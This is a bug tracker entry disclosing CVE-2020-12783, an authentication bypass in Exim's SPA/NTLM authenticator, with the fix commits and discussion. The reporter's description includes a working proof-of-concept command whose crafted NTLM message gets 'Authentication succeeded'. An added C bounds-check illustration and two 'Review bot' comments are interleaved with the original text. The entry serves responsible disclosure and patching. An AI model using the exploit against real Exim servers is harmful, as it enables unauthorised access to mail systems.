Bug 2571 - (CVE-2020-12783) Out-of-bound buffer read leads to Authentication Bypass in Exim SPA authentication method
Status: RESOLVED FIXED
Product: Exim
Classification: Unclassified
Component: SMTP Authentication
Version: 4.93
Hardware: x86-64 Linux
Importance: medium security
Target Milestone: Exim 4.94
Assigned To: Jeremy Harris
Reported: 2020-05-05 18:17 UTC by Orange Tsai
Modified: 2022-02-06 15:09 UTC (History)
Description Orange Tsai 2020-05-05 18:17:39 UTC
Hi, Exim security team. 

I am Orange Tsai from the DEVCORE security team. We just did a little audit on authentication mechanisms and found an out-of-bounds buffer read in the SPA implementation.

In `spa.c`, there is no check on the user-supplied NTLM authentication message. Since NTLM is an encoded structure, an attacker can supply a customized `length` and `offset` to read an arbitrary memory address.

For example:

The SPA username/password challenge check is in `spa.c#248`.
https://github.com/Exim/exim/blob/master/src/src/auths/spa.c#L249

Since we control the whole `responseptr`, we can adjust the `offset` to the address of `ntRespData` to bypass this authentication. Here is the PoC:

```
$ (echo 'EHLO test.org'; echo AUTH NTLM; echo "AAAA";    echo -ne 'o\x00r\x00a\x00n\x00g\x00e\x00\x00BDDCCCCBBGG\x70\x04\x00\x00BBCCCC\x0e\x00\x0e\x00\x0e\x00\x00\x00\x00\x00' | base64 -w0 ; echo ; echo QUIT) | ./exim -bh 127.0.0.1

**** SMTP testing session as if from host 127.0.0.1
**** but without any ident (RFC 1413) callback.
**** This is not for real!

>>> host in hosts_connection_nolog? no (option unset)
>>> host in host_lookup? yes (matched "*")
>>> looking up host name for 127.0.0.1
>>> IP address lookup using gethostbyaddr()
>>> IP address lookup yielded "localhost.localdomain"
>>>   alias "localhost"
>>> no IP addresses found for localhost.localdomain
>>> no IP addresses found for localhost
>>> 127.0.0.1 does not match any IP address for localhost.localdomain
>>> host in host_reject_connection? no (option unset)
>>> host in sender_unqualified_hosts? no (option unset)
>>> host in recipient_unqualified_hosts? no (option unset)
>>> host in helo_verify_hosts? no (option unset)
>>> host in helo_try_verify_hosts? no (option unset)
>>> host in helo_accept_junk_hosts? no (option unset)
220 ubuntu ESMTP Exim 4.93 Sun, 03 May 2020 10:25:45 +0800
>>> test.org in helo_lookup_domains? no (end of list)
>>> host in dsn_advertise_hosts? no (option unset)
>>> host in pipelining_advertise_hosts? yes (matched "*")
>>> host in auth_advertise_hosts? yes (matched "*")
>>> host in chunking_advertise_hosts? yes (matched "*")
>>> host in tls_advertise_hosts? yes (matched "*")
250-ubuntu Hello test.org [127.0.0.1]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH NTLM
250-CHUNKING
250-STARTTLS
250-PRDR
250 HELP
334 NTLM supported
334 TlRMTVNTUAACAAAAAAAAAAAoAAABggAAEDPISlBkLXQAAAAAAAAAAAAAAAAAAAAA
>>> spa authenticator server_condition:
>>>   $auth1 = orange
>>>   $1 = orange
235 Authentication succeeded
221 ubuntu closing connection
```


Our configuration:

```
$ cat /usr/exim/configure
...

spa:
  driver = spa
  public_name = NTLM
  server_password = ${lookup{$auth1}lsearch{/etc/exim/spa_clearpass}{$value}fail}
...

$ cat /etc/exim/spa_clearpass
orange:orange
```
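As an added illustration of the bounds problem this report describes (and of the 32-bit overflow raised later in comment 2), here is constructed example code, not Exim's `spa.c`: a naive `offset + length <= size` check on an NTLM security buffer beside one that cannot wrap. The `secbuf` type, the helper names and the 64-byte sample message are assumptions made for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* NTLM "security buffer" descriptor: uint16 len, uint16 maxlen, uint32 offset,
   little-endian; len and offset are relative to the start of the whole message. */
typedef struct { uint16_t len; uint32_t off; } secbuf;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{ return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }

/* Decode the 8-byte descriptor at byte position 'at'; caller guarantees at + 8 <= msg_len. */
static secbuf read_secbuf(const uint8_t *msg, size_t at)
{
  secbuf b = { rd16(msg + at), rd32(msg + at + 4) };
  return b;
}

/* Naive check: add first, compare after. In 32-bit arithmetic off = 0xFFFFFFF8
   plus len = 24 wraps to 16 and passes, the overflow problem raised in comment 2. */
static bool naive_in_bounds(secbuf b, uint32_t msg_len) { return b.off + b.len <= msg_len; }

/* Robust check: compare the offset with the bound before any addition, then the
   length against the space that remains. Nothing can wrap. */
static bool safe_in_bounds(secbuf b, size_t msg_len)
{ return b.off <= msg_len && b.len <= msg_len - b.off; }

/* Constructed 64-byte type-3 message (not a real client message): signature,
   message type 3, and an NtChallengeResponse descriptor at byte 20. */
static size_t build_msg(uint8_t out[64], uint16_t len, uint32_t off)
{
  memset(out, 0, 64);
  memcpy(out, "NTLMSSP", 8);
  out[8] = 3;
  for (int i = 0; i < 2; i++) out[20 + i] = out[22 + i] = (uint8_t)(len >> (8 * i));
  for (int i = 0; i < 4; i++) out[24 + i] = (uint8_t)(off >> (8 * i));
  return 64;
}

/* 0 = both checks reject, 1 = both accept, 2 = only the naive check accepts. */
static int check_nt_response(uint16_t len, uint32_t off)
{
  uint8_t msg[64];
  size_t n = build_msg(msg, len, off);
  secbuf b = read_secbuf(msg, 20);
  return safe_in_bounds(b, n) ? 1 : naive_in_bounds(b, (uint32_t)n) ? 2 : 0;
}
```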
Comment 1 Git Commit 2020-05-05 21:27:04 UTC
Git commit: https://git.exim.org/exim.git/commitdiff/57aa14b216432be381b6295c312065b2fd034f86

commit 57aa14b216432be381b6295c312065b2fd034f86
Author:     Jeremy Harris <jgh146exb@wizmail.org>
AuthorDate: Tue May 5 21:02:14 2020 +0100
Commit:     Jeremy Harris <jgh146exb@wizmail.org>
CommitDate: Tue May 5 21:02:14 2020 +0100

    fix spa authenticator, checking client-supplied data before using it.  bug 2571
----
 doc/doc-txt/ChangeLog    |   5 ++
 src/src/auths/auth-spa.c | 120 +++++++++++++++++++++++------------------------
 src/src/auths/spa.c      |  20 ++++++--
 3 files changed, 82 insertions(+), 63 deletions(-)
Comment 2 Orange Tsai 2020-05-06 06:55:54 UTC
Hi! The patch just checks that "pointer + offset" is smaller than the end of `responseptr`. However, the check condition is prone to integer overflow. An attacker can cause a crash on a 32-bit system.
Comment 3 Git Commit 2020-05-07 10:27:06 UTC
Git commit: https://git.exim.org/exim.git/commitdiff/a04174dc2a84ae1008c23b6a7109e7fa3fb7b8b0

commit a04174dc2a84ae1008c23b6a7109e7fa3fb7b8b0
Author:     Jeremy Harris <jgh146exb@wizmail.org>
AuthorDate: Wed May 6 22:31:25 2020 +0100
Commit:     Jeremy Harris <jgh146exb@wizmail.org>
CommitDate: Wed May 6 22:31:25 2020 +0100

    Rework SPA fix to avoid overflows.  Bug 2571
    
    Amends: 57aa14b216
---
 src/src/auths/spa.c | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)

diff --git a/src/src/auths/spa.c b/src/src/auths/spa.c
index f83d114..ff90d33 100644
--- a/src/src/auths/spa.c
+++ b/src/src/auths/spa.c
@@ -141,6 +141,7 @@ SPAAuthResponse  response;
 SPAAuthResponse  *responseptr = &response;
 uschar msgbuf[2048];
 uschar *clearpass, *s;
+unsigned off;
 
 /* send a 334, MS Exchange style, and grab the client's request,
 unless we already have it via an initial response. */
@@ -187,10 +188,13 @@ that causes failure if the size of msgbuf is exceeded. ****/
 
   {
   int i;
-  char * p = (CS responseptr) + IVAL(&responseptr->uUser.offset,0);
+  char * p;
   int len = SVAL(&responseptr->uUser.len,0)/2;
 
-  if (p + len*2 >= CS (responseptr+1))
+  if (  (off = IVAL(&responseptr->uUser.offset,0)) >= sizeof(SPAAuthResponse)
+     || len >= sizeof(responseptr->buffer)/2
+     || (p = (CS responseptr) + off) + len*2 >= CS (responseptr+1)
+     )
     {
     DEBUG(D_auth)
       debug_printf("auth_spa_server(): bad uUser spec in response\n");
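Review bot: the upper bound in the third condition, `CS (responseptr+1)`, is the end of the `SPAAuthResponse` struct rather than the number of bytes actually decoded from the client, so an offset that lies inside the struct but past the received data is still accepted and the code reads whatever the struct held before. Whether that matters depends on how `response` is initialised, which this hunk does not show; if the decoded length is available, check `off + len*2` against it as well. Separately, `len` stays an `int` while being compared with a `size_t`; it is non-negative here only because `SVAL` yields a 16-bit value, so a comment or an `unsigned` declaration would make that intent explicit.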
@@ -242,13 +246,14 @@ spa_smb_nt_encrypt(clearpass, challenge.challengeData, ntRespData);
 
 /* compare NT hash (LM may not be available) */
 
-s = (US responseptr) + IVAL(&responseptr->ntResponse.offset,0);
-if (s + 24 >= US (responseptr+1))
+off = IVAL(&responseptr->ntResponse.offset,0);
+if (off >= sizeof(SPAAuthResponse) - 24)
   {
   DEBUG(D_auth)
     debug_printf("auth_spa_server(): bad ntRespData spec in response\n");
   return FAIL;
   }
+s = (US responseptr) + off;
 
 if (memcmp(ntRespData, s, 24) == 0)
   return auth_check_serv_cond(ablock);	/* success. we have a winner. */
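Review bot: `off >= sizeof(SPAAuthResponse) - 24` rejects one more value than necessary, since an offset of exactly `sizeof(SPAAuthResponse) - 24` places the 24 compared bytes flush against the end of the struct and would be in bounds; `>` would suffice, and being conservative here is harmless. The rework does remove the overflow from comment 2, because the comparison is now done on `unsigned off` before any pointer is formed. The `memcmp` of the 24-byte NT response is not constant-time; a fixed-time comparison is the usual choice for an authentication token check, though that is outside the scope of this fix.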
Comment 4 Andreas Metzler 2020-05-07 16:57:09 UTC
Should this get a CVE?
Comment 5 Salvatore Bonaccorso 2020-05-11 08:01:16 UTC
Hi Andreas, I requested one from MITRE via the cveform.mitre.org (assuming this was not done yet, but have added a comment that it might have been already requested).
Comment 6 Salvatore Bonaccorso 2020-05-11 15:44:05 UTC
The CVE assigned by MITRE is CVE-2020-12783.
Comment 7 Renaud Allard 2020-05-11 16:21:59 UTC
Now that there is a CVE, I think it deserves a fix release for distributions.
Comment 8 Jeremy Harris 2020-05-12 21:30:23 UTC
Lacking further substantive comment on the fix, closing.